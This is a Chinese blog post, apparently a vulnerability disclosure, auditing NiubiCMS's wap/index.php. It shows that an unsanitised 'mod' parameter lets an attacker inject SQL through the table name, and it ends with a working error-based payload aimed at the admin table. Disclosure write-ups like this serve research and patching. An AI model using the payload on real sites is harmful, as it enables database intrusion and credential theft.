NiubiCMS通杀SQL注入一枚

  • A+
所属分类:漏洞时代
摘要

牛逼CMS 地方门户网站源码系统 PHP免费版。功能包含:新闻、房产、人才、汽车、二手、分类信息、交友、商城、团购、知道、论坛、DM读报、优惠券、本地商家、商家名片等功能。

牛逼CMS 地方门户网站源码系统 PHP免费版。功能包含:新闻、房产、人才、汽车、二手、分类信息、交友、商城、团购、知道、论坛、DM读报、优惠券、本地商家、商家名片等功能。

下载了一套准备搭建,但是自己做了下审计,发现了一个注入。其他待细看
niubicms/wap/index.php中

 switch($action)  {   default:    include template('index','wap');    break;   case 'show':    $id=intval($id);    if($mod=='job')    {     $sql="SELECT * FROM ".LA_PRE."job WHERE ".LA_PRE."job.id=$id ";         }    elseif($mod=='resume')    {     $sql="SELECT * FROM ".LA_PRE."jianli  WHERE ".LA_PRE."jianli.id=$id";    }    elseif($mod=='fang')    {     $sql="SELECT * FROM ".LA_PRE."loupan  WHERE ".LA_PRE."loupan.id=$id";    }    elseif($mod=='chuzu')    {     $sql="SELECT * FROM ".LA_PRE."content  WHERE ".LA_PRE."content.contentid=$id";    }    else  //如果$mod不是上面的resume、fang、chuzu就使用下面的    {     $sql="SELECT * FROM ".LA_PRE."$mod WHERE id=$id ";                 //select * from la_"$_GET[mod]" where id=$id     //这里我们使用补全的办法,把mod的值赋于一个已知存在的表名,再补全sql语句     //select * from la_"$_GET[mod]" where id=$id    }    $data=$db->fetch_one($sql);

在/include/mysql.class.php里面找到关于fetch_one的定义

 function fetch_one($sql)  {   $this->rs=$this->query($sql);//执行了sql语句   return $this->filter_pass(mysql_fetch_array($this->rs,MYSQL_ASSOC));//对返回的结果采取了filter_pass进行过滤  }

继续查看filter_pass函数。在文件/include/mysql.class.php找到了关于它的定义

   function filter_pass($string,$disabledattributes = array('onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavaible', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragdrop', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterupdate', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmoveout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'))     {    if(is_array($string))     {    foreach($string as $key => $val) $string[$key] = $this->filter_pass($val);    }    else    {    $string = stripslashes(preg_replace('//s('.implode('|', $disabledattributes).').*?([/s/>])/', '//2', preg_replace('/<(.*?)>/ie', "'<'.preg_replace(array('/javascript:[^/"/']*/i', '/(".implode('|', $disabledattributes).")[ //t//n]*=[ //t//n]*[/"/'][^/"/']*[/"/']/i', '//s+/'), array('', '', ' '), stripslashes('//1')) . '>'", $string)));    }    return $string;    }

发现是关于xss的过滤的。那么我们就继续看关于$mod的,我们看看install/data/install.sql里面

DROP TABLE IF EXISTS `la_admin`; DROP TABLE IF EXISTS `la_admin_log`; DROP TABLE IF EXISTS `la_adminrole`; DROP TABLE IF EXISTS `la_adv`; DROP TABLE IF EXISTS `la_area`; DROP TABLE IF EXISTS `la_ask_answer`; DROP TABLE IF EXISTS `la_ask_question`; DROP TABLE IF EXISTS `la_ask_type`; DROP TABLE IF EXISTS `la_attchment`;

随意挑选一个来进行".LA_PRE."$mod补全,比如admin

NiubiCMS通杀SQL注入一枚
再进行sql语句的补全..来看看admin表的结构

DROP TABLE IF EXISTS `la_admin`; CREATE TABLE `la_admin` (   `userid` mediumint(8) NOT NULL AUTO_INCREMENT,   `username` varchar(160) NOT NULL,   `password` varchar(32) NOT NULL,   `siteid` mediumint(8) NOT NULL DEFAULT '1',   `roleid` mediumint(8) NOT NULL DEFAULT '0',   `status` tinyint(1) NOT NULL DEFAULT '1',   PRIMARY KEY (`userid`) ) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=gbk;

那么我就补全的是where uid=sql注入语句了
类似于

admin where userid=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)#

NiubiCMS通杀SQL注入一枚
NiubiCMS通杀SQL注入一枚

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: